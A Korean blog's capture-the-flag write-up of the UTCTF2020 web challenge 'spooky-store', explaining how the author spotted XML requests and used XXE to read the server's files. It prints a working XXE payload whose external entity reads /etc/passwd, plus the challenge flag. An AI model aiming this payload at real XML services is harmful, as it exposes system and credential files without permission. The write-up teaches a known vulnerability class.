일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 보안뉴스
- SQL Injection
- reversing
- BOF
- CodeEngn
- webhacking
- RITSEC
- HackCTF
- Next.js
- Hackerschool
- buffer over flow
- ftz
- termux
- x64dbg
- 어셈블리어
- Shadow 동아리
- 리버싱
- ctf
- Nop Slide
- 리눅스
- Python
- RITSEC CTF 2019
- NewsClipping
- writeup
- Linux
- requests
- 버퍼오버플로우
- 뉴스클리핑
- 웹해킹
- PWN
Archives
- Today
- Total
Jaeseo's Information Security Story
UTCTF2020 - [WEB] spooky-store 본문
[WEB]spooky-store
문제 사이트로 접속을 합니다.
문제에서 알려 주는 정보와 동일하게 3개의 버튼이 존재 하고 Check 버튼을 누르면 해당하는 좌표 값이 출력이 되는 것을 볼 수 있습니다.
이때 BurpSuite로 패킷을 보게 되면 아래와 같이 XML 형태로 요청하는 모습을 볼 수 있는데 이것은 XXE
공격을 통해 공격을 하면 된다는 것을 바로 알 수 있었습니다. (XXE에 대해 궁금하시다면 예전에 Kshield Jr에서 공부를 하면서 정리한 글을 읽어 주세요 - 링크)
XXE 공격에 대해 취약한지 확인을 위해 DTD 문법을 통해 /etc/passwd 파일을 출력합니다.
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example SYSTEM 'file:///etc/passwd'> ]>
<locationCheck><productId>&example;</productId></locationCheck>
그러면 응답에 utctf
라는 계정이 있고 GID
필드 뒤에 FLAG가 작성되어 있는 것을 확인 할 수 있습니다.
utflag{n3xt_y3ar_go1ng_bl1nd}
'Write UP > UTCTF2020' 카테고리의 다른 글
UTCTF2020 - [NETWORKING]Nittaku-3-Star-Premium (0) | 2020.03.09 |
---|---|
UTCTF2020 - [NETWORKING]Do-Not-Stop (0) | 2020.03.09 |
UTCTF2020 - [WEB]Shrek-Fans-Only (0) | 2020.03.09 |
Comments